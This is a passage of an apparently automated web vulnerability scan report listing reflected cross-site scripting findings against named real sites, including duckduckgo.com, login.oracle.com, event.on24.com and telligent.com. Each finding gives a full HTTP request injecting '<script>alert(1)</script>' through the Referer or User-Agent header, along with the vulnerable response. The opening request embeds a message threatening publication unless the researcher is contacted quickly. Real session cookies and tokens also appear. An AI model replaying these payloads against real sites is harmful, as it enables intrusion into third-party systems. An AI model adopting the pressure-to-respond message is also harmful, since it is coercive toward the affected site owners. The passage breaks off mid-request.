GET /e.js?from=h02332%40gmail.com&body=Hoyt+LLC+Research+investigates+and+reports+on+security+vulnerabilities+embedded+in+Web+Applications+and+Products+used+in+wide-scale+deployment.+%0D%0A%0D%0ADisclosure+Info+%40+URI+http%3A%2F%2Fwww.cloudscan.me%2Fp%2Fhoyt-llc-research-vulnerability.html%0D%0A%0D%0AHello+-+David+Hoyt+here+with+Hoyt+LLC+Research+in+Boston%2C+MA+with+a+Private+Vuln+Report.+You%27ve+got+XSS%2C+everywhere...+everywhere..+%0D%0A%0D%0AE-mail+me+back+at+h02332%40gmail.com+quickly+if+you+don%27t+wants+this+published+at+URI+http%3A%2F%2Fxss.cx%2Fi%2Fduck.co-xss-1.jpg+and+http%3A%2F%2Fxss.cx%2Fi%2Fduckduckgo.com-xss-1.jpg%0D%0A%0D%0ABest%3B%0D%0A%0D%0ADavid%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A&copy=on&go= HTTP/1.1
Host: duckduckgo.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=79faa"><script>alert(1)</script>b50ac4e0b24b5c6ac
Cache-Control: max-age=0
Origin: http://duckduckgo.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:18:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Sun, 12 Nov 1999 20:28:05 GMT
Content-Length: 1462

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="robots" content="no
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=79faa"><script>alert(1)</script>b50ac4e0b24b5c6ac">
...[SNIP]...

3.227. https://event.on24.com/eventRegistration/EventLobbyServlet [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://event.on24.com
Path:   /eventRegistration/EventLobbyServlet

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /eventRegistration/EventLobbyServlet?target=registration.jsp&eventid=274282&sessionid=1&key=453849B62CAB589517473EC368BF9542&partnerref=ocom&sourcepage=register HTTP/1.1
Host: event.on24.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d3ae7--><script>alert(1)</script>b0977adf47b
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:21 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: JSESSIONID=0rvu9xpQXsuNNX5uqSg34XHsQnJPAPazjTKeFaBUv5dhOISD2nsl!865718048; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close


<!-- optional parameters
cb            : leave blank to hide logo, or pass in appropriate cb value
topmargin        - default is 20
leftmargin        
...[SNIP]...
t 100%. useful to restrict content of two column reg page
middlecolumn: # of pixels for middle column. default is 4.
fyi: your user-agent string is: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d3ae7--><script>alert(1)</script>b0977adf47b
-->
...[SNIP]...

3.228. https://login.oracle.com/mysso/signon.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/signon.jsp

Request

GET /mysso/signon.jsp?site2pstoretoken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D&p_error_code=&p_submit_url=https%3A%2F%2Flogin.oracle.com%2Fsso%2Fauth&p_cancel_url=http%3A%2F%2Fmyprofile.oracle.com&ssousername=&subscribername= HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=f3f59"><script>alert(1)</script>a68788fd6cd
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA; ORASSO_AUTH_HINT=v1.0~20110227072629; BIGipServerloginadc_oracle_com_http=2030932621.25630.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:27:53 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 29 cfhOct 1969 17:04:19 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerloginadc_oracle_com_http=2030932621.25630.0000; expires=Sun, 27-Feb-2011 07:27:53 GMT; path=/
Content-Length: 8443

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<!--Template file taken from conftest -->
<!DOCTYPE HTML PUB
...[SNIP]...
<a href="https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://www.google.com/search?hl=en&q=f3f59"><script>alert(1)</script>a68788fd6cd" class="boldbodylink">
...[SNIP]...

3.229. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /pls/orasso/orasso.wwsso_app_admin.ls_login

Request

GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=c91e7"><script>alert(1)</script>8e874b658df
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:27:52 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 29 cfhOct 1969 17:04:19 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerloginadc_oracle_com_http=1997378189.25630.0000; expires=Sun, 27-Feb-2011 07:27:52 GMT; path=/
Content-Length: 8443

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<!--Template file taken from conftest -->
<!DOCTYPE HTML PUB
...[SNIP]...
<a href="https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://www.google.com/search?hl=en&q=c91e7"><script>alert(1)</script>8e874b658df" class="boldbodylink">
...[SNIP]...

3.230. http://telligent.com/products/request_a_demo.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://telligent.com
Path:   /products/request_a_demo.aspx

Request

GET /products/request_a_demo.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;
Referer: http://www.google.com/search?hl=en&q=20662"><script>alert(1)</script>4f1a3620730

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a57+GMT; expires=Sun, 26-Feb-2012 23:21:57 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:57 GMT
Connection: close
Content-Length: 66403


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" id="referrer" name="referrer" value="http://www.google.com/search?hl=en&q=20662"><script>alert(1)</script>4f1a3620730">
...[SNIP]...

3.231. http://telligent.com/resources/m/analysts/1343205.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://telligent.com
Path:   /resources/m/analysts/1343205.aspx

Request

GET /resources/m/analysts/1343205.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;
Referer: http://www.google.com/search?hl=en&q=137cc"><script>alert(1)</script>610a59d58cb

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a27+GMT; expires=Sun, 26-Feb-2012 23:22:27 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:22:27 GMT
Connection: close
Content-Length: 64261


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" id="referrer" name="referrer" value="http://www.google.com/search?hl=en&q=137cc"><script>alert(1)</script>610a59d58cb">
...[SNIP]...

3.232. http://telligent.com/resources/m/analysts/1345217.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://telligent.com
Path:   /resources/m/analysts/1345217.aspx

Request

GET /resources/m/analysts/1345217.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;
Referer: http://www.google.com/search?hl=en&q=bbc8d"><script>alert(1)</script>3a0b6097669

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a36+GMT; expires=Sun, 26-Feb-2012 23:22:36 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:22:36 GMT
Connection: close
Content-Length: 64972


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" id="referrer" name="referrer" value="http://www.google.com/search?hl=en&q=bbc8d"><script>alert(1)</script>3a0b6097669">
...[SNIP]...

3.233. http://telligent.com/resources/m/success_stories/1331597.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://telligent.com
Path:   /resources/m/success_stories/1331597.aspx

Request

GET /resources/m/success_stories/1331597.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;
Referer: http://www.google.com/search?hl=en&q=ad044"><script>alert(1)</script>2b4dec818f3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a43+GMT; expires=Sun, 26-Feb-2012 23:22:43 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:22:43 GMT
Connection: close
Content-Length: 64200


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" id="referrer" name="referrer" value="http://www.google.com/search?hl=en&q=ad044"><script>alert(1)</script>2b4dec818f3">
...[SNIP]...

3.234. http://telligent.com/support/request_an_upgrade/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://telligent.com
Path:   /support/request_an_upgrade/

Request

GET /support/request_an_upgrade/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;
Referer: http://www.google.com/search?hl=en&q=3cdbf"><script>alert(1)</script>e4ccb6eed44

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a23%3a35+GMT; expires=Sun, 26-Feb-2012 23:23:35 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:23:35 GMT
Connection: close
Content-Length: 61451


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" id="referrer" name="referrer" value="http://www.google.com/search?hl=en&q=3cdbf"><script>alert(1)</script>e4ccb6eed44">
...[SNIP]...

3.235. http://www.fusionbot.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fusionbot.com
Path:   /

Request

GET / HTTP/1.1
Host: www.fusionbot.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-88